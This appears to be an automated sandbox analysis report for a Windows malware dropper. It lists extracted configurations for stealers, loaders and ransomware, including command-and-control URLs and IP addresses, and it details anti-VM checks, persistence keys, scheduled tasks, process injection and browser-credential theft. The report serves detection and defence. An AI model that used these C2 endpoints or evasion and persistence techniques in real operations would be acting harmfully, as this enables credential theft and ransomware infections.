Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
229s -
max time network
1804s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
22-10-2021 14:38
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Fri051e1e7444.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
Fri051e1e7444.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
Fri051e1e7444.exe
Resource
win11
Behavioral task
behavioral5
Sample
Fri051e1e7444.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Fri051e1e7444.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Fri051e1e7444.exe
Resource
win10-de-20210920
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
vidar
41.5
916
https://mas.to/@xeroxxx
-
profile_id
916
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Extracted
raccoon
1.8.1
874dee7d322070fc6dc34b3b6cd43904077db44d
-
url4cnc
https://telete.in/isuzoShadowhunter
Extracted
redline
205.185.119.191:60857
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
vidar
41.5
921
https://mas.to/@xeroxxx
-
profile_id
921
Extracted
redline
james222
135.181.129.119:4805
Extracted
icedid
1875681804
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 3048 rundll32.exe 135 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 3048 rundll32.exe 135 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral5/memory/1952-246-0x00000000030E0000-0x00000000030FF000-memory.dmp family_redline behavioral5/memory/1952-261-0x0000000004E30000-0x0000000004E4D000-memory.dmp family_redline behavioral5/memory/4588-311-0x00000000004368BE-mapping.dmp family_redline behavioral5/memory/4580-310-0x0000000000418B0E-mapping.dmp family_redline behavioral5/memory/4588-309-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral5/memory/4580-308-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/6084-396-0x0000000000418AFE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000400000001abef-138.dat family_socelars behavioral5/files/0x000400000001abef-139.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 4548 created 3724 4548 WerFault.exe 90 PID 1012 created 588 1012 WerFault.exe 109 PID 4192 created 828 4192 WerFault.exe 150 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 7 IoCs
resource yara_rule behavioral5/memory/1228-183-0x0000000000D60000-0x0000000000E36000-memory.dmp family_vidar behavioral5/memory/3960-187-0x0000000000DB0000-0x0000000000E86000-memory.dmp family_vidar behavioral5/memory/3960-191-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar behavioral5/memory/1228-189-0x0000000000400000-0x00000000008E3000-memory.dmp family_vidar behavioral5/memory/2076-218-0x0000000001800000-0x00000000018D8000-memory.dmp family_vidar behavioral5/files/0x000400000001ac52-254.dat family_vidar behavioral5/files/0x000400000001ac52-252.dat family_vidar -
Blocklisted process makes network request 4 IoCs
flow pid Process 284 3392 mshta.exe 301 3392 mshta.exe 312 3392 mshta.exe 315 3392 mshta.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DllHost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Process not Found -
Executes dropped EXE 60 IoCs
pid Process 1808 AgGOSclM3apmo74sb5reIH3y.exe 1184 nHvwzSVZB5C_2lNYpayO6xbN.exe 1396 _g7tmzcXIP_JNr02UultIUME.exe 2404 TrvPKMajtMffCi7iitJBZDnB.exe 2520 e6WeCqUpNWJV6aPgszJeX9E0.exe 2076 LYOsEH3xUWPTG6qnvscLPweb.exe 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe 2184 IU5rmCoRAx2aHgjhPh2xdpHv.exe 2060 OerARSDN8_Y6xtKjAv9ItJbN.exe 1228 6OMebL7JbPas8BcXIUNnfFcX.exe 2120 JFXVqZOn7ssgWpUgV2CUaIij.exe 3960 VEa4XNX37VROBVrK80k5VxkO.exe 3724 aj1qRBbUcTuprnRCEvZjOudA.exe 3532 omVlxP3RfKIM3eS4IizTb8IP.exe 1952 RD8KFq6f5QViwV0MrTou3rpZ.exe 3608 AecmysbzIXMVq1dRFsqTK8lb.exe 1632 fEbcFuzCW9Be1RqlDsqMbCAi.exe 1784 r3FYzQQodjD253E15m9ZD5ze.exe 2732 Y7B85KyvjK4STp4RCLBO190o.exe 680 GmsDXcf5_0hLpT8X9au5MwZp.exe 2524 TrvPKMajtMffCi7iitJBZDnB.exe 588 omVlxP3RfKIM3eS4IizTb8IP.exe 2224 x7X0Exp5JXLQiSV9Bd8veIvG.exe 4212 x7X0Exp5JXLQiSV9Bd8veIvG.tmp 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4732 build.exe 4012 6gLgVHK4S6fRDlTOaK71bGb9.exe 4148 DYbALA.exe 4824 cutm3.exe 4868 DownFlSetup999.exe 4924 inst3.exe 4580 _g7tmzcXIP_JNr02UultIUME.exe 4588 GmsDXcf5_0hLpT8X9au5MwZp.exe 1480 MS7ss0t3Z_BgNm5vQL0FhEFR.exe 828 OOEA7DkxfTRmQavkjfVnrAHD.exe 3740 z43qKkeelVhYZeo9SP_z8aeG.exe 3392 mshta.exe 5124 zObJUR9EVjyfYx_qv35UyzNe.exe 5156 r8MBUoHvcWqO6aNLC5f23A0S.exe 5180 f7VAnYD0ZMCm46C7pv9aNPyZ.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6084 r3FYzQQodjD253E15m9ZD5ze.exe 6124 f7VAnYD0ZMCm46C7pv9aNPyZ.tmp 6028 svchost.exe 1160 setup.exe 3872 kPBhgOaGQk.exe 5796 DllHost.exe 5688 setup.exe 4312 foldershare.exe 3952 A53B.exe 5220 foldershare.exe 5776 Wysadudaecu.exe 5012 Mipijaedila.exe 4312 foldershare.exe 1268 ZHalijicaeshe.exe 5680 SHumokyhefi.exe 4916 379.exe 6004 19D1.exe 3680 Conhost.exe 6544 GcleanerEU.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Y7B85KyvjK4STp4RCLBO190o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Y7B85KyvjK4STp4RCLBO190o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 379.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 379.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IU5rmCoRAx2aHgjhPh2xdpHv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AecmysbzIXMVq1dRFsqTK8lb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IU5rmCoRAx2aHgjhPh2xdpHv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AecmysbzIXMVq1dRFsqTK8lb.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Fri051e1e7444.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation 6gLgVHK4S6fRDlTOaK71bGb9.exe -
Loads dropped DLL 29 IoCs
pid Process 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4212 x7X0Exp5JXLQiSV9Bd8veIvG.tmp 1228 6OMebL7JbPas8BcXIUNnfFcX.exe 1228 6OMebL7JbPas8BcXIUNnfFcX.exe 3960 VEa4XNX37VROBVrK80k5VxkO.exe 3960 VEa4XNX37VROBVrK80k5VxkO.exe 4732 build.exe 4732 build.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6124 f7VAnYD0ZMCm46C7pv9aNPyZ.tmp 1160 setup.exe 1160 setup.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 5688 setup.exe 5688 setup.exe 6004 19D1.exe 6288 msiexec.exe 6288 msiexec.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4528 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/files/0x000400000001abe9-140.dat themida behavioral5/files/0x000400000001ac0a-174.dat themida behavioral5/files/0x000400000001ac09-178.dat themida behavioral5/memory/2732-230-0x0000000000080000-0x0000000000081000-memory.dmp themida behavioral5/memory/2184-232-0x0000000000370000-0x0000000000371000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Peqydaelyly.exe\"" DllHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xumaelyfyshu.exe\"" Process not Found -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JFXVqZOn7ssgWpUgV2CUaIij.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 379.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IU5rmCoRAx2aHgjhPh2xdpHv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Mipijaedila.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SHumokyhefi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Y7B85KyvjK4STp4RCLBO190o.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OerARSDN8_Y6xtKjAv9ItJbN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA x7X0Exp5JXLQiSV9Bd8veIvG.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA z43qKkeelVhYZeo9SP_z8aeG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AecmysbzIXMVq1dRFsqTK8lb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA f7VAnYD0ZMCm46C7pv9aNPyZ.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 167 ipinfo.io 5890 api.2ip.ua 18 ipinfo.io 19 ipinfo.io 211 ipinfo.io 1368 api.2ip.ua 4910 api.2ip.ua 169 ipinfo.io 218 ip-api.com 524 ip-api.com 558 ipinfo.io 560 ipinfo.io 1129 api.2ip.ua 1130 api.2ip.ua -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2184 IU5rmCoRAx2aHgjhPh2xdpHv.exe 2732 Y7B85KyvjK4STp4RCLBO190o.exe 4916 379.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2404 set thread context of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 3532 set thread context of 588 3532 omVlxP3RfKIM3eS4IizTb8IP.exe 109 PID 1396 set thread context of 4580 1396 _g7tmzcXIP_JNr02UultIUME.exe 118 PID 680 set thread context of 4588 680 GmsDXcf5_0hLpT8X9au5MwZp.exe 117 PID 1784 set thread context of 6084 1784 r3FYzQQodjD253E15m9ZD5ze.exe 160 PID 4312 set thread context of 3952 4312 foldershare.exe 182 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe e6WeCqUpNWJV6aPgszJeX9E0.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files (x86)\WindowsPowerShell\Xumaelyfyshu.exe Process not Found File created C:\Program Files (x86)\WindowsPowerShell\Xumaelyfyshu.exe.config Process not Found File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe DllHost.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe.config DllHost.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe e6WeCqUpNWJV6aPgszJeX9E0.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files (x86)\Windows Defender\Peqydaelyly.exe DllHost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe Process not Found File created C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe.config Process not Found -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\System\xxx1.bak AecmysbzIXMVq1dRFsqTK8lb.exe File created C:\Windows\System\svchost.exe AecmysbzIXMVq1dRFsqTK8lb.exe File opened for modification C:\Windows\System\svchost.exe AecmysbzIXMVq1dRFsqTK8lb.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Process not Found File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
pid pid_target Process procid_target 4376 3724 WerFault.exe 90 4980 3724 WerFault.exe 90 4676 3724 WerFault.exe 90 1048 3724 WerFault.exe 90 4548 3724 WerFault.exe 90 1012 588 WerFault.exe 109 4152 828 WerFault.exe 150 5468 828 WerFault.exe 150 5604 828 WerFault.exe 150 5728 828 WerFault.exe 150 4108 828 WerFault.exe 150 3756 828 WerFault.exe 150 4192 828 WerFault.exe 150 6816 6544 WerFault.exe 231 1512 6544 WerFault.exe 231 6412 6544 WerFault.exe 231 6928 6544 WerFault.exe 231 1512 6956 WerFault.exe 257 5496 6956 WerFault.exe 257 6148 6956 WerFault.exe 257 2320 6956 WerFault.exe 257 4216 6848 WerFault.exe 258 5720 6956 WerFault.exe 257 8028 6848 WerFault.exe 258 4504 6956 WerFault.exe 257 -
NSIS installer 4 IoCs
resource yara_rule behavioral5/files/0x000400000001ac3d-220.dat nsis_installer_1 behavioral5/files/0x000400000001ac3d-220.dat nsis_installer_2 behavioral5/files/0x000400000001ac3d-226.dat nsis_installer_1 behavioral5/files/0x000400000001ac3d-226.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI zObJUR9EVjyfYx_qv35UyzNe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A53B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TrvPKMajtMffCi7iitJBZDnB.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TrvPKMajtMffCi7iitJBZDnB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI zObJUR9EVjyfYx_qv35UyzNe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A53B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 19D1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 19D1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 19D1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TrvPKMajtMffCi7iitJBZDnB.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI zObJUR9EVjyfYx_qv35UyzNe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A53B.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 6OMebL7JbPas8BcXIUNnfFcX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6OMebL7JbPas8BcXIUNnfFcX.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VEa4XNX37VROBVrK80k5VxkO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VEa4XNX37VROBVrK80k5VxkO.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2460 schtasks.exe 808 schtasks.exe 5760 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 4936 timeout.exe 3304 timeout.exe 1812 timeout.exe 8652 timeout.exe 8816 timeout.exe 6632 timeout.exe 8116 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 9160 bitsadmin.exe -
Kills process with taskkill 12 IoCs
pid Process 5800 taskkill.exe 5772 taskkill.exe 5696 taskkill.exe 7804 taskkill.exe 7148 taskkill.exe 5224 taskkill.exe 5076 taskkill.exe 5784 taskkill.exe 888 taskkill.exe 7096 taskkill.exe 6136 taskkill.exe 8472 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe -
Modifies registry class 48 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe 